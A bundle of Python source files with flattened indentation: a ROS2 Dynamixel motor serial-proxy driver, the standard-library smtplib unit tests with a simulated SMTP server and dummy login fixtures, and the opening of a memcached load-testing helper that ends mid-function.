def _parse_notify_time(self, value: Union[str, int], default: dict = {"hour": 21, "minute": 0}) -> dict:
if type(value) == int:
return {"hour": value, "minute": 0}
value = cast(str, value)
match = re.match(r"(?:[01]\d|2[0-3]):(?:[0-5]\d)", value)
if match:
return {"hour": int(value[:2]), "minute": int(value[-2:])}
return default
|
dynamixel_serial_proxy.py
|
# -*- coding: utf-8 -*-
#
# Software License Agreement (BSD License)
#
# Copyright (c) 2010-2011, Antons Rebguns.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of University of Arizona nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
__author__ = 'Antons Rebguns'
__copyright__ = 'Copyright (c) 2010-2011 Antons Rebguns'
__credits__ = 'Cody Jorgensen, Cara Slutter'
__license__ = 'BSD'
__maintainer__ = 'Antons Rebguns'
__email__ = 'anton@email.arizona.edu'
import math
import sys
import errno
from collections import deque
from threading import Thread
from collections import defaultdict
#import roslib
#roslib.load_manifest('dynamixel_driver')
import rclpy
from rclpy.node import Node
from . import dynamixel_io
from .dynamixel_const import *
from diagnostic_msgs.msg import DiagnosticArray
from diagnostic_msgs.msg import DiagnosticStatus
from diagnostic_msgs.msg import KeyValue
from dynamixel_msgs.msg import MotorState
from dynamixel_msgs.msg import MotorStateList
class SerialProxy(Node):
def __init__(self,
port_name='/dev/ttyUSB0',
port_namespace='ttyUSB0',
baud_rate='1000000',
min_motor_id=1,
max_motor_id=25,
update_rate=5,
diagnostics_rate=1,
error_level_temp=75,
warn_level_temp=70,
readback_echo=False,
node_namespace=None):
super().__init__(port_namespace, namespace=node_namespace)
self.port_name = port_name
self.port_namespace = port_namespace
self.baud_rate = baud_rate
self.min_motor_id = min_motor_id
self.max_motor_id = max_motor_id
self.update_rate = update_rate
self.diagnostics_rate = diagnostics_rate
self.error_level_temp = error_level_temp
self.warn_level_temp = warn_level_temp
self.readback_echo = readback_echo
self.actual_rate = update_rate
self.error_counts = {'non_fatal': 0, 'checksum': 0, 'dropped': 0}
self.current_state = MotorStateList()
self.num_ping_retries = 5
self.motor_states_pub = self.create_publisher(MotorStateList, 'motor_states/%s' % self.port_namespace, 1)
self.diagnostics_pub = self.create_publisher(DiagnosticArray, '/diagnostics', 1)
def connect(self):
try:
self.dxl_io = dynamixel_io.DynamixelIO(self.port_name, self.baud_rate, self.readback_echo)
self.__find_motors()
except dynamixel_io.SerialOpenError as e:
self.get_logger().fatal(e.message)
raise
self.running = True
if self.update_rate > 0: Thread(target=self.__update_motor_states).start()
if self.diagnostics_rate > 0: Thread(target=self.__publish_diagnostic_information).start()
def disconnect(self):
self.running = False
def __fill_motor_parameters(self, motor_id, model_number):
"""
Stores some extra information about each motor on the parameter server.
Some of these paramters are used in joint controller implementation.
"""
angles = self.dxl_io.get_angle_limits(motor_id)
voltage = self.dxl_io.get_voltage(motor_id)
voltages = self.dxl_io.get_voltage_limits(motor_id)
firmware = self.dxl_io.get_firmware_version(motor_id)
delay = self.dxl_io.get_return_delay_time(motor_id)
self.declare_parameter('%d.model_number' % motor_id, model_number)
self.declare_parameter('%d.model_name' % motor_id, DXL_MODEL_TO_PARAMS[model_number]['name'])
self.declare_parameter('%d.min_angle' % motor_id, angles['min'])
self.declare_parameter('%d.max_angle' % motor_id, angles['max'])
torque_per_volt = DXL_MODEL_TO_PARAMS[model_number]['torque_per_volt']
self.declare_parameter('%d.torque_per_volt' % motor_id, torque_per_volt)
self.declare_parameter('%d.max_torque' % motor_id, torque_per_volt * voltage)
velocity_per_volt = DXL_MODEL_TO_PARAMS[model_number]['velocity_per_volt']
rpm_per_tick = DXL_MODEL_TO_PARAMS[model_number]['rpm_per_tick']
self.declare_parameter('%d.velocity_per_volt' % motor_id, velocity_per_volt)
self.declare_parameter('%d.max_velocity' % motor_id, velocity_per_volt * voltage)
self.declare_parameter('%d.radians_second_per_encoder_tick' % motor_id, rpm_per_tick * RPM_TO_RADSEC)
encoder_resolution = DXL_MODEL_TO_PARAMS[model_number]['encoder_resolution']
range_degrees = DXL_MODEL_TO_PARAMS[model_number]['range_degrees']
range_radians = math.radians(range_degrees)
self.declare_parameter('%d.encoder_resolution' % motor_id, encoder_resolution)
self.declare_parameter('%d.range_degrees' % motor_id, range_degrees)
self.declare_parameter('%d.range_radians' % motor_id, range_radians)
self.declare_parameter('%d.encoder_ticks_per_degree' % motor_id, encoder_resolution / range_degrees)
self.declare_parameter('%d.encoder_ticks_per_radian' % motor_id, encoder_resolution / range_radians)
self.declare_parameter('%d.degrees_per_encoder_tick' % motor_id, range_degrees / encoder_resolution)
self.declare_parameter('%d.radians_per_encoder_tick' % motor_id, range_radians / encoder_resolution)
# keep some parameters around for diagnostics
self.motor_static_info[motor_id] = {}
self.motor_static_info[motor_id]['model'] = DXL_MODEL_TO_PARAMS[model_number]['name']
self.motor_static_info[motor_id]['firmware'] = firmware
self.motor_static_info[motor_id]['delay'] = delay
self.motor_static_info[motor_id]['min_angle'] = angles['min']
self.motor_static_info[motor_id]['max_angle'] = angles['max']
self.motor_static_info[motor_id]['min_voltage'] = voltages['min']
self.motor_static_info[motor_id]['max_voltage'] = voltages['max']
def __find_motors(self):
self.get_logger().info('%s: Pinging motor IDs %d through %d...' % (self.port_namespace, self.min_motor_id, self.max_motor_id))
self.motors = []
self.motor_static_info = {}
for motor_id in range(self.min_motor_id, self.max_motor_id + 1):
for trial in range(self.num_ping_retries):
try:
result = self.dxl_io.ping(motor_id)
except Exception as ex:
self.get_logger().error('Exception thrown while pinging motor %d - %s' % (motor_id, ex))
continue
if result:
self.motors.append(motor_id)
break
if not self.motors:
self.get_logger().fatal('%s: No motors found.' % self.port_namespace)
raise Exception('No motors found.')
counts = defaultdict(int)
to_delete_if_error = []
for motor_id in self.motors:
for trial in range(self.num_ping_retries):
try:
model_number = self.dxl_io.get_model_number(motor_id)
self.__fill_motor_parameters(motor_id, model_number)
except Exception as ex:
self.get_logger().error('Exception thrown while getting attributes for motor %d - %s' % (motor_id, ex))
if trial == self.num_ping_retries - 1: to_delete_if_error.append(motor_id)
continue
counts[model_number] += 1
break
for motor_id in to_delete_if_error:
self.motors.remove(motor_id)
self.declare_parameter('connected_ids', self.motors)
status_str = '%s: Found %d motors - ' % (self.port_namespace, len(self.motors))
for model_number,count in counts.items():
if count:
model_name = DXL_MODEL_TO_PARAMS[model_number]['name']
status_str += '%d %s [' % (count, model_name)
for motor_id in self.motors:
if self.motor_static_info[motor_id]['model'] == model_name:
status_str += '%d, ' % motor_id
status_str = status_str[:-2] + '], '
self.get_logger().info('%s, initialization complete.' % status_str[:-2])
def __update_motor_states(self):
num_events = 50
rates = deque([float(self.update_rate)]*num_events, maxlen=num_events)
last_time = self.get_clock().now()
rate = self.create_rate(self.update_rate)
while rclpy.ok() and self.running:
# get current state of all motors and publish to motor_states topic
motor_states = []
for motor_id in self.motors:
try:
state = self.dxl_io.get_feedback(motor_id)
if state:
motor_states.append(MotorState(**state))
if dynamixel_io.exception: raise dynamixel_io.exception
except dynamixel_io.FatalErrorCodeError as fece:
self.get_logger().error(fece)
except dynamixel_io.NonfatalErrorCodeError as nfece:
self.error_counts['non_fatal'] += 1
self.get_logger().debug(nfece)
except dynamixel_io.ChecksumError as cse:
self.error_counts['checksum'] += 1
self.get_logger().debug(cse)
except dynamixel_io.DroppedPacketError as dpe:
self.error_counts['dropped'] += 1
self.get_logger().debug(dpe.message)
except OSError as ose:
if ose.errno != errno.EAGAIN:
self.get_logger().fatal(errno.errorcode[ose.errno])
#rospy.signal_shutdown(errno.errorcode[ose.errno])
rclpy.shutdown()
if motor_states:
msl = MotorStateList()
msl.motor_states = motor_states
self.motor_states_pub.publish(msl)
self.current_state = msl
# calculate actual update rate
current_time = self.get_clock().now()
rates.append(1000000000.0 / (current_time - last_time).nanoseconds)
self.actual_rate = round(sum(rates)/num_events, 2)
last_time = current_time
rate.sleep()
def __publish_diagnostic_information(self):
diag_msg = DiagnosticArray()
rate = self.create_rate(self.diagnostics_rate)
while rclpy.ok() and self.running:
diag_msg.status = []
diag_msg.header.stamp = self.get_clock().now().to_msg()
status = DiagnosticStatus()
status.name = 'Dynamixel Serial Bus (%s)' % self.port_namespace
status.hardware_id = 'Dynamixel Serial Bus on port %s' % self.port_name
status.values.append(KeyValue(key='Baud Rate', value=str(self.baud_rate)))
status.values.append(KeyValue(key='Min Motor ID', value=str(self.min_motor_id)))
status.values.append(KeyValue(key='Max Motor ID', value=str(self.max_motor_id)))
status.values.append(KeyValue(key='Desired Update Rate', value=str(self.update_rate)))
status.values.append(KeyValue(key='Actual Update Rate', value=str(self.actual_rate)))
status.values.append(KeyValue(key='# Non Fatal Errors', value=str(self.error_counts['non_fatal'])))
status.values.append(KeyValue(key='# Checksum Errors', value=str(self.error_counts['checksum'])))
status.values.append(KeyValue(key='# Dropped Packet Errors', value=str(self.error_counts['dropped'])))
status.level = DiagnosticStatus.OK
status.message = 'OK'
if self.actual_rate - self.update_rate < -5:
status.level = DiagnosticStatus.WARN
status.message = 'Actual update rate is lower than desired'
diag_msg.status.append(status)
for motor_state in self.current_state.motor_states:
mid = motor_state.id
status = DiagnosticStatus()
status.name = 'Robotis Dynamixel Motor %d on port %s' % (mid, self.port_namespace)
status.hardware_id = 'DXL-%d@%s' % (motor_state.id, self.port_namespace)
status.values.append(KeyValue(key='Model Name', value=str(self.motor_static_info[mid]['model'])))
status.values.append(KeyValue(key='Firmware Version', value=str(self.motor_static_info[mid]['firmware'])))
status.values.append(KeyValue(key='Return Delay Time', value=str(self.motor_static_info[mid]['delay'])))
status.values.append(KeyValue(key='Minimum Voltage', value=str(self.motor_static_info[mid]['min_voltage'])))
status.values.append(KeyValue(key='Maximum Voltage', value=str(self.motor_static_info[mid]['max_voltage'])))
status.values.append(KeyValue(key='Minimum Position (CW)', value=str(self.motor_static_info[mid]['min_angle'])))
status.values.append(KeyValue(key='Maximum Position (CCW)', value=str(self.motor_static_info[mid]['max_angle'])))
status.values.append(KeyValue(key='Goal', value=str(motor_state.goal)))
status.values.append(KeyValue(key='Position', value=str(motor_state.position)))
status.values.append(KeyValue(key='Error', value=str(motor_state.error)))
status.values.append(KeyValue(key='Velocity', value=str(motor_state.speed)))
status.values.append(KeyValue(key='Load', value=str(motor_state.load)))
status.values.append(KeyValue(key='Voltage', value=str(motor_state.voltage)))
status.values.append(KeyValue(key='Temperature', value=str(motor_state.temperature)))
status.values.append(KeyValue(key='Moving', value=str(motor_state.moving)))
if motor_state.temperature >= self.error_level_temp:
status.level = DiagnosticStatus.ERROR
status.message = 'OVERHEATING'
elif motor_state.temperature >= self.warn_level_temp:
status.level = DiagnosticStatus.WARN
status.message = 'VERY HOT'
else:
status.level = DiagnosticStatus.OK
status.message = 'OK'
diag_msg.status.append(status)
self.diagnostics_pub.publish(diag_msg)
rate.sleep()
def main(args=None):
rclpy.init(args=args)
try:
serial_proxy = SerialProxy()
serial_proxy.connect()
rclpy.spin(serial_proxy)
finally:
serial_proxy.disconnect()
rclpy.shutdown()
if __name__ == '__main__':
main()
|
test_smtplib.py
|
import asyncore
import email.utils
import socket
import smtpd
import smtplib
import StringIO
import sys
import time
import select
import unittest
from test import test_support
try:
import threading
except ImportError:
threading = None
HOST = test_support.HOST
def server(evt, buf, serv):
serv.listen(5)
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
@unittest.skipUnless(threading, 'Threading required for this test.')
class GeneralTests(unittest.TestCase):
def setUp(self):
self._threads = test_support.threading_setup()
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = test_support.bind_port(self.sock)
servargs = (self.evt, "220 Hola mundo\n", self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
self.thread.join()
test_support.threading_cleanup(*self._threads)
def testBasic1(self):
# connects
smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testBasic2(self):
# connects, include port in host name
smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
# check that supplied local_hostname is used
smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
self.assertEqual(smtp.local_hostname, "testhost")
smtp.close()
def testTimeoutDefault(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(smtp.sock.gettimeout() is None)
smtp.close()
def testTimeoutValue(self):
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
@unittest.skipUnless(threading, 'Threading required for this test.')
class DebuggingServerTests(unittest.TestCase):
def setUp(self):
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = StringIO.StringIO()
sys.stdout = self.output
self._threads = test_support.threading_setup()
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1))
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
test_support.threading_cleanup(*self._threads)
# restore sys.stdout
sys.stdout = self.old_stdout
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.quit()
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, 'Ok')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, 'Ok')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testNotImplemented(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (502, 'Error: command "EHLO" not implemented')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testVRFY(self):
# VRFY isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (502, 'Error: command "VRFY" not implemented')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.helo()
expected = (503, 'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.assertEqual(smtp.help(), 'Error: command "HELP" not implemented')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises socket.error
self.assertRaises(socket.error, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(socket.error, smtplib.SMTP,
"localhost:bogus")
# test response of client to a non-successful HELO message
@unittest.skipUnless(threading, 'Threading required for this test.')
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
self.old_stdout = sys.stdout
self.output = StringIO.StringIO()
sys.stdout = self.output
self._threads = test_support.threading_setup()
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = test_support.bind_port(self.sock)
servargs = (self.evt, "199 no hello for you!\n", self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
self.thread.join()
test_support.threading_cleanup(*self._threads)
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@somewhere.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_auth_credentials = {
'login': 'TXIuQUBzb21ld2hlcmUuY29t',
'plain': 'AE1yLkFAc29tZXdoZXJlLmNvbQBzb21lcGFzc3dvcmQ=',
'cram-md5': ('TXIUQUBZB21LD2HLCMUUY29TIDG4OWQ0MJ'
'KWZGQ4ODNMNDA4NTGXMDRLZWMYZJDMODG1'),
}
sim_auth_login_password = 'C29TZXBHC3N3B3JK'
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@somewhere.com',],
}
# Simulated SMTP channel & server
class SimSMTPChannel(smtpd.SMTPChannel):
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
smtpd.SMTPChannel.__init__(self, *args, **kw)
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_AUTH(self, arg):
if arg.strip().lower()=='cram-md5':
self.push('334 {0}'.format(sim_cram_md5_challenge))
return
mech, auth = arg.split()
mech = mech.lower()
if mech not in sim_auth_credentials:
self.push('504 auth type unimplemented')
return
if mech == 'plain' and auth==sim_auth_credentials['plain']:
self.push('235 plain auth ok')
elif mech=='login' and auth==sim_auth_credentials['login']:
self.push('334 Password:')
else:
self.push('550 No access for you!')
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
def __init__(self, *args, **kw):
self._extra_features = []
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accept(self):
conn, addr = self.accept()
self._SMTPchannel = SimSMTPChannel(self._extra_features,
self, conn, addr)
def process_message(self, peer, mailfrom, rcpttos, data):
pass
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self._threads = test_support.threading_setup()
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1))
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
test_support.threading_cleanup(*self._threads)
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for email, name in sim_users.items():
expected_known = (250, '%s %s' % (name, smtplib.quoteaddr(email)))
self.assertEqual(smtp.vrfy(email), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, 'No such user: %s' % u)
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, '\n'.join(users))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, 'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
expected_auth_ok = (235, b'plain auth ok')
self.assertEqual(smtp.login(sim_auth[0], sim_auth[1]), expected_auth_ok)
# SimSMTPChannel doesn't fully support LOGIN or CRAM-MD5 auth because they
# require a synchronous read to obtain the credentials...so instead smtpd
# sees the credential sent by smtplib's login method as an unknown command,
# which results in smtplib raising an auth error. Fortunately the error
# message contains the encoded credential, so we can partially check that it
# was generated correctly (partially, because the 'word' is uppercased in
# the error message).
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
if sim_auth_login_password not in str(err):
raise "expected encoded password not found in error message"
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
if sim_auth_credentials['cram-md5'] not in str(err):
raise "expected encoded credentials not found in error message"
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
def test_main(verbose=None):
test_support.run_unittest(GeneralTests, DebuggingServerTests,
NonConnectingTests,
BadHELOServerTests, SMTPSimTests)
if __name__ == '__main__':
test_main()
|
data_helper.py
|
import copy
import socket
from multiprocessing.process import Process
from multiprocessing.queues import Queue
import random
import time
from random import Random
import uuid
from TestInput import TestInputServer
from TestInput import TestInputSingleton
import lib.logger
import lib.crc32
import hashlib
import threading
from lib.mc_bin_client import MemcachedClient, MemcachedError
from lib.mc_ascii_client import MemcachedAsciiClient
from lib.memcached.helper.old_kvstore import ClientKeyValueStore
from lib.membase.api.rest_client import RestConnection, RestHelper, Bucket
from lib.memcacheConstants import ERR_NOT_FOUND, ERR_NOT_MY_VBUCKET, ERR_ETMPFAIL, ERR_EINVAL
import json
import sys
from lib.perf_engines import mcsoda
class MemcachedClientHelperExcetion(Exception):
def __init__(self, errorcode, message):
Exception.__init__(self, errorcode, message)
self._message = message
self.errorcode = errorcode
self._args = (errorcode, message)
class MemcachedClientHelper(object):
#value_sizes {10:0.1,20:0.2:40:0.8}
@staticmethod
def create_threads(servers=None,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True,
async_write=False,
delete_ratio=0,
expiry_ratio=0):
log = logger.Logger.get_logger()
if not servers:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="servers is not set")
if ram_load_ratio < 0 and number_of_items < 0:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="ram_load_ratio or number_of_items must be specified")
if not value_size_distribution:
value_size_distribution = {16: 0.25, 128: 0.25, 512: 0.25, 1024: 0.25}
list = []
if ram_load_ratio >= 0:
info = RestConnection(servers[0]).get_bucket(name)
emptySpace = info.stats.ram - info.stats.memUsed
space_to_fill = (int((emptySpace * ram_load_ratio) / 100.0))
log.info('space_to_fill : {0}, emptySpace : {1}'.format(space_to_fill, emptySpace))
for size, probability in value_size_distribution.items():
how_many = int(space_to_fill / (size + 250) * probability)
payload_generator = DocumentGenerator.make_docs(number_of_items,
{"name": "user-${prefix}", "payload": "memcached-json-${prefix}-${padding}",
"size": size, "seed": str(uuid.uuid4())})
list.append({'size': size, 'value': payload_generator, 'how_many': how_many})
else:
for size, probability in value_size_distribution.items():
how_many = ((number_of_items / number_of_threads)* probability)
payload_generator = DocumentGenerator.make_docs(number_of_items,
{"name": "user-${prefix}", "payload": "memcached-json-${prefix}-${padding}",
"size": size, "seed": str(uuid.uuid4())})
list.append({'size': size, 'value': payload_generator, 'how_many': how_many})
for item in list:
item['how_many'] /= int(number_of_threads)
#at least one element for each value size
if item['how_many'] < 1:
item['how_many'] = 1
msg = "each thread will send {0} items with value of size : {1}"
log.info(msg.format(item['how_many'], item['size']))
threads = []
for i in range(0, int(number_of_threads)):
#choose one of the servers random
thread = WorkerThread(serverInfo=MemcachedClientHelper.random_pick(servers),
name=name,
values_list=list,
override_vBucketId=override_vBucketId,
write_only=write_only,
moxi=moxi,
async_write=async_write,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio)
threads.append(thread)
return threads
@staticmethod
def create_threads_for_load_bucket(serverInfo=None,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True,
delete_ratio=0,
expiry_ratio=0):
log = logger.Logger.get_logger()
if not serverInfo:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="serverInfo is not set")
if ram_load_ratio < 0 and number_of_items < 0:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="ram_load_ratio or number_of_items must be specified")
